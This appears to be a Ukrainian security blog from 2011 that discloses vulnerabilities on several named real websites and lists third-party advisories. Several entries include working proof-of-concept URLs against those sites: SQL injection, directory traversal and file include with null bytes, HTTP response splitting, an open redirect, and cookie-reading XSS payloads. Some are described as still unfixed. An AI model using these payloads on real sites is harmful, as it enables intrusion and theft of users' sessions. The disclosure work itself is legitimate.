Websecurity - Веб безпека

22.01.2011

У листопаді, 05.11.2010, я знайшов Cross-Site Scripting, Abuse of Functionality та Insufficient Anti-automation уразливості на проекті http://br-ua.com. Про що найближчим часом сповіщу адміністрацію проекту.

Раніше я вже писав про уразливості на www.br-ua.com.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

12.10.2011

XSS:

Три XSS уразливості - дві на сторінці реєстрації та одна на сторінці відновлення паролю. Приклади експлоітів для даних уразливостей.

Abuse of Functionality:

http://br-ua.com/users/register
http://br-ua.com/users/remind

На сторінках реєстрації та відновлення паролю можна визначати емайли користувачів (що є логінами).

Insufficient Anti-automation:

http://br-ua.com/users/register
http://br-ua.com/users/remind

Хоча капчі використовуються на даних сторінках, але для визначення емайлів (логінів) користувачів не потрібно вводити коректну капчу.

Дані уразливості досі не виправлені. Зараз адміни змінили домен br-ua.com на br.mirkvartir.ua (піддомен сайта mirkvartir.ua, теж дірявого), при цьому залишивши всі уразливості. Домен вони змінили явно за для економії, так само як вони економлять на безпеці власних сайтів.

В даній добірці уразливості в веб додатках:

• Default Credentials Vulnerability in Cisco Network Registrar (деталі)
• Joomla! 1.6.0 | SQL Injection Vulnerability (деталі)
• Default Credentials for root Account on the Cisco Media Experience Engine 5600 (деталі)
• Joomla! 1.6.0 | Cross Site Scripting (XSS) Vulnerability (деталі)
• GDM vulnerability (деталі)
• bbPress 1.0.2 <= Cross Site Scripting Vulnerability (деталі)
• Sybase OneBridge Mobile Data Suite Format String Remore Code Execution Vulnerability (деталі)
• bbPress 1.0.2 <= Cross Site Scripting Vulnerability (деталі)
• HP OpenView Storage Data Protector, Remote Execution of Arbitrary Code (деталі)
• Douran Portal File Download/Source Code Disclosure Vulnerability (деталі)

21.01.2011

У листопаді, 05.11.2010, я знайшов Cross-Site Scripting, Abuse of Functionality та Brute Force уразливості на проекті http://mirkvartir.ua. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше.

11.10.2011

XSS:

Три XSS уразливості - дві на сторінці реєстрації та одна на сторінці відновлення паролю. Приклади експлоітів для даних уразливостей.

Abuse of Functionality:

http://mirkvartir.ua/users/register

http://mirkvartir.ua/users/remind

На сторінках реєстрації та відновлення паролю можна визначати емайли користувачів (що є логінами).

Brute Force:

http://mirkvartir.ua/admin/

Дані уразливості досі не виправлені.

В даній добірці уразливості в веб додатках:

• CodeMeter WebAdmin Cross-site Scripting (XSS) Vulnerability (деталі)
• XSRF (CSRF) in LotusCMS (деталі)
• Sun Microsystems Directory Server DSML-over-HTTP Username Search Denial of Service Vulnerability (деталі)
• XSS vulnerability in LotusCMS (деталі)
• Sun Microsystems Directory Server Enterprise ASN.1 Parsing Remote Code Execution Vulnerability (деталі)
• BoutikOne Multiples SQL Injection Vulnerability (деталі)
• Sun Microsystems Directory Server Enterprise DSML UTF-8 Denial of Service Vulnerability (деталі)
• SAP NetWaver XI SOAP Adapter - XSS (деталі)
• Hackproofing Oracle Financials 11i & R12 (деталі)
• SAP NetWeaver logon.html - XSS (деталі)

18.01.2011

У жовтні, 30.10.2010, я знайшов SQL Injection, SQL DB Structure Extraction та Cross-Site Scripting уразливості на сайті http://www.d1.ie. Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливості з’явиться пізніше.

10.10.2011

SQL Injection:

http://www.d1.ie/visual.php?intProjectID=-1%20or%20version()%3E4

http://www.d1.ie/page.php?intPageID=-1%20or%20version()%3E4

SQL DB Structure Extraction:

http://www.d1.ie/visual.php?intProjectID=’

http://www.d1.ie/page.php?intPageID=’

XSS:

• alert(document.cookie)
• alert(document.cookie)
• цікавий
• html включення

Дані уразливості досі не виправлені.

В даній добірці уразливості в веб додатках:

• 7T Interactive Graphical SCADA System (IGSS) Remote Memory Corruption (деталі)
• Path disclosure in xt:Commerce (деталі)
• Path disclosure in OXID eShop (деталі)
• Cisco RVS4000 and WRVS4400N Web Management Interface Vulnerabilities (деталі)
• File Content Disclosure in LotusCMS (деталі)
• Cisco Content Delivery System Internet Streamer: Web Server Vulnerability (деталі)
• XSS vulnerability in LotusCMS (деталі)
• Remote Password Disclosure Vulnerability in RXS-3211 IP Camera + others (деталі)
• XSS vulnerability in LotusCMS (деталі)
• XSS vulnerability in LotusCMS (деталі)

19.01.2011

У жовтні, 30.10.2010, я знайшов Directory Traversal, Local File Include, Null Byte Injection та Denial of Service уразливості на хакерському проекті http://hackzona.ru (на DT дірку звернув мою увагу Dementor). Про що найближчим часом сповіщу адміністрацію проекту.

Раніше я вже писав про уразливості на hackzona.ru.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

08.10.2011

Directory Traversal + Null Byte Injection:

http://hackzona.ru/hz.php?name=News&file=../../robots.txt%00

Local File Include + Null Byte Injection:

http://hackzona.ru/hz.php?name=News&file=file.php%00

DoS (Recursive File Include):

http://hackzona.ru/hz.php?name=News&file=../../hz

Дані уразливості вже виправлені.

В даній добірці уразливості в веб додатках:

• HP 3COM/H3C Intelligent Management Center tftpserver WRQ Remote Code Execution Vulnerability (деталі)
• Multiple XSS vulnerabilities in CosmoShop (деталі)
• HP 3COM/H3C Intelligent Management Center img Remote Code Execution Vulnerability (деталі)
• XSS vulnerability in CosmoShop (деталі)
• HP 3COM/H3C Intelligent Management Center tftpserver DATA/ERROR Remote Code Execution Vulnerability (деталі)
• SAP NetWeaver Integration Directory - multiple XSS (деталі)
• HP Intelligent Management Center (IMC), Remote Execution of Arbitrary Code (деталі)
• SAP NetWeaver Runtime - multiple XSS (деталі)
• HP/Palm webOS, Execution of Arbitrary Code, Denial of Service (DoS), Unauthorized File System Write Access (деталі)
• SugarCRM list privilege restriction bypass (деталі)

13.01.2011

У жовтні, 25.10.2010, я знайшов HTTP Response Splitting, Cross-Site Scripting та Redirector уразливості на проекті http://www.ex.ua (файлообмінник). Про що найближчим часом сповіщу адміністрацію проекту.

Раніше я вже писав про уразливість на www.ex.ua.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

07.10.2011

HTTP Response Splitting:

http://www.ex.ua/delete_object/1?back=http://1%0AHeader:1

XSS (через HTTP Response Splitting):

• alert(document.cookie)
• цікавий

Redirector (URL Redirector Abuse):

http://www.ex.ua/delete_object/1?back=http://websecurity.com.ua

Дані уразливості досі не виправлені. Що дуже типово для ламерів-адмінів цього сайта.

В даній добірці уразливості в веб додатках:

• HP 3COM/H3C Intelligent Management Center tftpserver mode Remote Code Execution Vulnerability (деталі)
• Re: Cross-Site Scripting vulnerability in Nagios (деталі)
• HP 3COM/H3C Intelligent Management Center imcsyslogdm Remote Code Execution Vulnerability (деталі)
• Air Contacts Lite (iPhone / iPod App Denial Of Service) (деталі)
• HP 3COM/H3C Intelligent Management Center tftpserver opcode_table Remote Code Execution Vulnerability (деталі)
• Cross-Site Scripting vulnerability in Nagios (деталі)
• HP 3COM/H3C Intelligent Management Center dbman sprintf Remote Code Execution Vulnerability (деталі)
• SQL injection vulnerability in CosmoShop (деталі)
• VMware vCenter Server and vSphere Client security vulnerabilities (деталі)
• XSS vulnerability in CosmoShop (деталі)